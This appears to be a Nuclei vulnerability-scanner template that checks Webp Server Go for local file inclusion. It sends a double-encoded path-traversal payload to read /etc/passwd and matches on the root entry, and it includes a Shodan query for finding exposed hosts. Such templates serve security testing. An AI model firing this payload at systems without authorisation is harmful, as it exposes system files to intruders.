nuclei-templates/http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml

34 lines
863 B
YAML

id: webp-server-go-lfi
info:
name: Webp server go - Local File Inclusion
author: pikpikcu
severity: high
description: Webp server go is vulnerable to local file inclusion.
reference:
- https://github.com/webp-sh/webp_server_go/issues/92
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
metadata:
max-request: 1
verified: true
shodan-query: http.html:"Webp"
tags: lfi,webp
http:
- method: GET
path:
- "{{BaseURL}}/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200